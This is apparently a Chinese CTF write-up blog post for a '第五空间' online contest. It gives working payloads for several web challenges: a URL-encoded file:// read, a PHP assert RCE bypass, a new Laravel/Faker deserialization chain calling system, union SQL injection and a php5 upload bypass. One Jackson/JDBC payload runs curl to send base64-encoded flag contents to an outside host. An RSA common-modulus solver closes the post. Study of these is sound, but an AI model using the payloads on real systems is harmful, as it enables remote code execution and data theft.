Altm4nz's blog

WEB划水选手

第五空间线上赛

WEB

只能说题目质量比去年好一些

do you know

1
2
3
4
$poc=$_SERVER['QUERY_STRING'];
if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){
die("no hacker");
}

看到$poc是通过QUERY_STRING获取的,显然url编码绕过。
再看xxe.php

1
2
3
if($_SERVER["REMOTE_ADDR"] !== "127.0.0.1"){
die('show me your identify');
}

思路清晰,通过index.php来访问xxe.php造成xxe攻击。
准备利用gopher协议向xxe发post包,在构造过程中,post包数据带有file字眼,在第一层被过滤了,用urlencode绕过。
然后突然发现。。直接用file协议读文件不就完了?

1
http://121.36.64.91/?%75rl=a&url=%66%69%6c%65%3a%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%61%69%6e%2e%70%68%70

看到flag.php ,于是去读flag.php拿到flag。应该非预期了,也懒得去继续构造gopher了。

hate-php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
if(!isset($_GET['code'])){
highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) {
die('You are too good for me');
}
$blacklist = get_defined_functions()['internal'];
foreach ($blacklist as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('You deserve better');
}
}
assert($code);
}

过滤了一堆东西,然后塞进assert了,老套路,直接构造异或。
网上找的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
$l = "";
$r = "";
$argv = str_split("cat flag.php");
for($i=0;$i<count($argv);$i++)
{
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255);
if($k == $argv[$i]){
if($j<16){
$l .= "%ff";
$r .= "%0" . dechex($j);
continue;
}
$l .= "%ff";
$r .= "%" . dechex($j);
continue;
}
}
}
echo "\{$l`$r\}";
?>

最终pay

1
http://121.36.74.163/?code=(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%93%9e%98%d1%8f%97%8f)

zzm’s blog

提示了 jackson
找到相关文章
https://www.cnblogs.com/xinzhao/p/11005419.html
https://www.anquanke.com/post/id/203086

服务器上起一个fakeMysql ,然后安装好ysoserial
修改下payload

1
http://121.36.46.83/?query={%22id%22:[%22com.mysql.cj.jdbc.admin.MiniAdmin%22,%20%22jdbc:mysql://134.175.2.73:3306/test?autoDeserialize=true%26queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor%26user=yso_CommonsCollections7_bash%20-c%20curl${IFS}http://134.175.2.73:2333/`cat${IFS}/tmp/flag*|base64`%22]}

因为下划线会报错,所以用通配符去读flag,curl带出数据

解base64即可

laravel

代码审计发现了反序列化点,尝试了5.7.28可用的反序列化链都不行。
于是自己找到了新的链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
namespace Faker{
class Generator{
protected $formatters = ['addCollection' => 'system'];
}
}
namespace Symfony\Component\Routing\Loader\Configurator{
class ImportConfigurator
{
private $parent;
protected $route;

public function __construct($parent, $route)
{
$this->parent = $parent;
$this->route = $route;
}
}
}

namespace test{
$a = new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator(new \Faker\Generator(), "ls");
echo urlencode(serialize($a));
}

成功RCE

美团外卖

www.zip拿到源码
首先发现了一个熟悉的文件
/lib/webuploader/0.1.5/server/preview.php
存在任意文件上传,但是BAN了php,尝试php5上传,然后发现这个文件在线上环境被删了。???
继续看,登录处发现注入,但是由于waf存在无法盲注。
又在daochu.php找到一处带回显的注入。

1
http://119.3.183.154/daochu.php?type=1&imei=" union select 1,2,hints,4,5,6 from hint #

看到hint,给了个目录。
956c110ef9decdd920249f5fed9e4427 进去发现还是登录页面,套娃吗。
这个目录下的系统发现preview.php存在,于是上传php5后缀尝试。
返回了个e98a4571cf72b798077d12d6c94629.php

去访问告诉我get file ,于是

1
http://119.3.183.154/956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/server/e98a4571cf72b798077d12d6c94629.php?file=/flag

嗯 这题不知道在考什么。

crypto

roby

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# coding:utf8
import gmpy2
import libnum
import codecs

n=0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557L
c1=0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707L
c2=0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcbL
e1=0xf4c1158fL
e2=0xf493f7d1L
s1=libnum.xgcd(e1,e2)[0]
s2=libnum.xgcd(e1,e2)[1]

if(s1<0):
s1=-s1
c1=gmpy2.invert(c1,n)
if(s2<0):
s2=-s2
c2=gmpy2.invert(c2,n)
m=libnum.n2s((pow(c1,s1,n)*pow(c2,s2,n)%n))
print(m)